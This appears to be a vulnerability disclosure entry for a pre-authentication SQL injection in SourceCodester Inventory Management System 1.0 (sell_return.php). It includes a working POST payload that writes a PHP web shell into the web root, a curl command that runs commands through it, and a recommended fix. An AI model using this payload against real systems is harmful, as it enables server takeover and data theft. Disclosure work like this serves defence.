| Titel | Pre-Authentication RCE in Inventory Management System 1.0 sell_return.php |
|---|
| Beschreibung |
## Summary
A SQL Injection vulnerability exists in SourceCodester Inventory Management System 1.0 via the pid parameter in sell_return.php.
## Issue Description
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.
Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.
The affected script takes a value via a POST request and eventually concatenates it in a SQL query.
sell_return.php line 11
```
$pid = $_POST['pid'];
```
This value is parsed as an array which can be manipulated to contain a malicious payload
sell_return.php lines 35-37
```
for ($i=0; $i < count($orderQuantity); $i++) {
// update product quantity
$select_product_data = $pdo->prepare("SELECT * FROM `products` WHERE `id` = $pid[$i]");
```
## Affected URL/Area
<host>/ample/app/action/sell_return.php
This is supposed to only be accessible to a logged in administrator, but can be called directly due to the lack of authz checks.
## Risk Rating
- Risk: **HIGH**
- Difficulty to Exploit: **LOW**
## CVSS Justification
### Network
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
### Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
### None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack.
### None
The vulnerable system can be exploited without interaction from any user.
### Changed
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
### High
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
### High
There is a total loss of data integrity.
### High
There is a total loss of availability.
## Steps to reproduce
Attacker makes this request
```
POST /ample/app/action/sell_return.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 350
return_id=1&customer_id=1&customer_name=1&pid[0]=1&pid[1]=1337 UNION ALL SELECT '<?php system($_GET["cmd"]); ?>', '', '', '', '', '', '', '', '', '', '', '', '', '', '' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --
&pro_name=1&orderQuantity[0]=1&orderQuantity[1]=2&returnQty=1&sellPrice=1&return_subtotal=1&prev_due=1&return_netTotal=1&return_date=1
```
Should now be able to use the malicious PHP script to execute commands.
```
curl http://localhost/rce.php?cmd=whoami
```
## Affected Demographic/User Base
Any users of this service for inventory management are at risk of having their data stolen, manipulated, or destroyed.
The host of this server is at risk of system compromise.
## Recommended Fix
Use RBAC to verify the authz and authn of a user. Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.
## Note
For the issued CVE ID, please credit Michael Blunt as the discovering researcher.
List contact email as [email protected].
The author of this project has been contacted and this information minus this note has been shared.
## References
### SQLi
https://cwe.mitre.org/data/definitions/89.html
https://owasp.org/www-community/attacks/SQL_Injection
https://www.rapid7.com/fundamentals/sql-injection-attacks/
https://en.wikipedia.org/wiki/SQL_injection
https://brightsec.com/blog/sql-injection-attack/
### Authz
https://cwe.mitre.org/data/definitions/284.html
https://cwe.mitre.org/data/definitions/285.html
https://martellosecurity.com/kb/mitre/cwe/285/
https://docs.guardrails.io/docs/vulnerability-classes/insecure-authentication/improper-authentication
https://www.invicti.com/blog/web-security/how-to-avoid-authentication-and-authorization-vulnerabilities/
## Impact
### Attack Scenario
An attacker who finds this system can forge a request to the sell_return.php endpoint and create a malicious PHP file.
This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp.
This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database. |
|---|
| Benutzer | mikel22 (UID 51822) |
|---|
| Einreichung | 31.07.2023 16:50 (vor 3 Jahren) |
|---|
| Moderieren | 05.08.2023 18:45 (5 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 236219 [SourceCodester Inventory Management System 1.0 sell_return.php pid SQL Injection] |
|---|
| Punkte | 17 |
|---|